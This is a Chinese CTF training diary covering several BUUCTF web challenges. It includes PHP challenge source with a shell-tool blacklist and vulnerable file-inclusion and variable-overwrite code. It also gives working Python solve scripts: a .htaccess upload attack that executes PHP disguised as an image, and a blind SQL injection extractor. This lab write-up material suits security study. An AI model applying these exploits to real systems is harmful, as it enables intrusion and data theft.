本文主要是介绍[BUUCTF]第九天训练日记,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- [De1CTF 2019]SSRF Me
- [安洵杯 2019]easy_web
- [GXYCTF2019]BabyUpload
- [BJDCTF2020]Mark loves cat
- 我有一个数据库
- [BJDCTF2020]The mystery of ip
- [BJDCTF2020]ZJCTF,不过如此
- [GKCTF2020]CheckIN
- [GYCTF2020]Ezsqli
[De1CTF 2019]SSRF Me
[安洵杯 2019]easy_web
首先打开网页,看到url有个cmd就以为是rce,然后看到提示
连续解码两次获得一个md5数字,以为是md5,还是我太菜了,结果是十六进制数字
index.php生成参数TmprMlpUWTBOalUzT0RKbE56QTJPRGN3,得到的结果解码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {echo '<img src ="./ctf3.jpeg">';die("xixi~ no flag");
} else {$txt = base64_encode(file_get_contents($file));echo "<img src='data:image/gif;base64," . $txt . "'></img>";echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {echo("forbid ~");echo "<br>";
} else {if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {echo `$cmd`;} else {echo ("md5 is funny ~");}
}?>
<html>
<style>body{background:url(./bj.png) no-repeat center center;background-size:cover;background-attachment:fixed;background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
然后a和b不可以用hackbar因为hackbar默认要编码一次,所以burp
[GXYCTF2019]BabyUpload
import requests
url = "http://a49eadda-16e3-4db7-8d9c-6bc1aa62bca8.node3.buuoj.cn"
session = requests.session()
htaccess = {'uploaded': ('.htaccess', "AddType application/x-httpd-php .jpg", 'image/jpeg')}
r1 = session.post(url, files=htaccess)files2 = {'uploaded': ('6.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res = session.post(url, files=files2)
print(res.text)然后访问得到flag
[BJDCTF2020]Mark loves cat
网页打开是一堆没用的果然是git源码泄露
buu的docker环境出错把我搞了一下,现在好了
这是关键代码
<?phpinclude 'flag.php';$yds = "dog";
$is = "cat";
$handsome = 'yds';foreach($_POST as $x => $y){$$x = $y;
}foreach($_GET as $x => $y){$$x = $$y;
}foreach($_GET as $x => $y){if($_GET['flag'] === $x && $x !== 'flag'){exit($handsome);}
}if(!isset($_GET['flag']) && !isset($_POST['flag'])){exit($yds);
}if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){exit($is);
}echo "the flag is: ".$flag;
我有一个数据库
太简单了CVE-2018-12613
[BJDCTF2020]The mystery of ip
前面没保存懒得写上去
啥都没发现。看看wp去
smarty模板注入
[BJDCTF2020]ZJCTF,不过如此
代码审计
<?phperror_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){die("Not now!");}include($file); //next.php}
else{highlight_file(__FILE__);
}
?>
本地文件包含配合php伪协议的使用
preg_replace() /e模式命令执行
[GKCTF2020]CheckIN
[GYCTF2020]Ezsqli
import requestsurl = "http://5a3ceadf-9981-4fb8-a8c0-5a04a4d8fbf1.node3.buuoj.cn/index.php"result = ""
i = 0while True:i = i + 1head = 32tail = 127while head < tail:mid = (head + tail) >> 1# payload = "0^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})".format(i, mid)payload = "0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})".format(i, mid)data = {"id":payload}r = requests.post(url,data=data)r.encoding = "utf-8"# print(url+payload)if "Nu1L" in r.text:head = mid + 1else:# print(r.text)tail = midlast = resultif head != 32:result += chr(head)else:breakprint(result)这篇关于[BUUCTF]第九天训练日记的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
